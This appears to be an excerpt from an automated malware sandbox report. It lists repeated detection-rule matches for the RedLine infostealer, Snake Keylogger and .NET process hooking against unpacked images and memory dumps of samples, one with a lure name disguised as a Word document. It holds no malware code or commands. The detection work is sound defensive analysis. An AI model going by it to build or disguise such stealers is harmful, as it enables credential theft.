          Source: 4.1.xzeheenC.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 4.2.xzeheenC.pif.1f670000.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 4.2.xzeheenC.pif.1f670000.8.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 13.3.xzeheenC.pif.2ed4e980.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 13.3.xzeheenC.pif.2ed4e980.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 9.2.xzeheenC.pif.342cc896.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 9.2.xzeheenC.pif.342cc896.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 9.2.xzeheenC.pif.36aa0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 9.2.xzeheenC.pif.36aa0000.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 13.2.xzeheenC.pif.30ca0f08.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 13.2.xzeheenC.pif.30ca0f08.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 13.2.xzeheenC.pif.330f0000.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 13.2.xzeheenC.pif.330f0000.8.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 9.1.xzeheenC.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 13.1.xzeheenC.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 9.2.xzeheenC.pif.3558e790.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 9.2.xzeheenC.pif.3558e790.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 9.2.xzeheenC.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 9.2.xzeheenC.pif.370d0000.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 9.2.xzeheenC.pif.370d0000.8.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 13.2.xzeheenC.pif.31d75570.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 13.2.xzeheenC.pif.31d75570.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 4.2.xzeheenC.pif.1d270000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 4.2.xzeheenC.pif.1d270000.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 4.2.xzeheenC.pif.1ce5c896.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 4.2.xzeheenC.pif.1ce5c896.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 9.2.xzeheenC.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 9.2.xzeheenC.pif.36aa0f08.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 9.2.xzeheenC.pif.36aa0f08.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 6.2.Cneehezx.PIF.214d58a8.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 9.2.xzeheenC.pif.342cc896.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 9.2.xzeheenC.pif.342cc896.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 4.2.xzeheenC.pif.1e32e790.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 4.2.xzeheenC.pif.1e32e790.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 13.2.xzeheenC.pif.31dae790.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 13.2.xzeheenC.pif.31dae790.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 4.2.xzeheenC.pif.1e2f5570.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 4.2.xzeheenC.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 13.2.xzeheenC.pif.30ca0f08.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 13.3.xzeheenC.pif.2ed4e980.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 13.3.xzeheenC.pif.2ed4e980.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 4.2.xzeheenC.pif.1ce5b98e.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 9.2.xzeheenC.pif.35555570.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 13.2.xzeheenC.pif.3092b98e.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 13.2.xzeheenC.pif.31d75570.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 9.2.xzeheenC.pif.36aa0000.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 4.2.xzeheenC.pif.1ce5b98e.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 9.2.xzeheenC.pif.35555570.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 9.2.xzeheenC.pif.342cb98e.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 13.2.xzeheenC.pif.3092b98e.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 13.2.xzeheenC.pif.30ca0f08.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 4.2.xzeheenC.pif.1e2f5570.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 13.2.xzeheenC.pif.31d75570.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 9.2.xzeheenC.pif.36aa0000.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 9.2.xzeheenC.pif.342cb98e.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 9.2.xzeheenC.pif.35555570.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 9.2.xzeheenC.pif.35556478.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 9.2.xzeheenC.pif.35555570.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 9.2.xzeheenC.pif.35556478.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 0.2.D.G Governor Istek,Docx.exe.21a1c948.9.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 00000004.00000002.3435180894.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 00000004.00000002.3467561668.000000001CE1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 00000009.00000002.3474258234.0000000035551000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 00000009.00000002.3474966321.0000000036AA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 00000009.00000002.3474966321.0000000036AA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 00000004.00000003.2246468592.000000001B22B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 00000009.00000002.3471014628.000000003428B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 0000000D.00000003.2424661790.000000002ED4E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 00000009.00000002.3435325759.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 00000004.00000002.3468182063.000000001D270000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 00000004.00000002.3468182063.000000001D270000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 0000000D.00000001.2421840333.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 00000009.00000001.2342337171.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 0000000D.00000002.3472612070.00000000330F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 0000000D.00000002.3472612070.00000000330F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 00000004.00000001.2234117095.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 00000004.00000002.3468357631.000000001D2F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
          Source: 00000009.00000002.3475804863.00000000370D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 00000009.00000002.3475804863.00000000370D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 0000000D.00000002.3435459349.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 0000000D.00000002.3468359572.0000000030CA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 0000000D.00000002.3468359572.0000000030CA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 0000000D.00000002.3471453220.0000000031D71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 00000004.00000002.3471183670.000000001E2F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
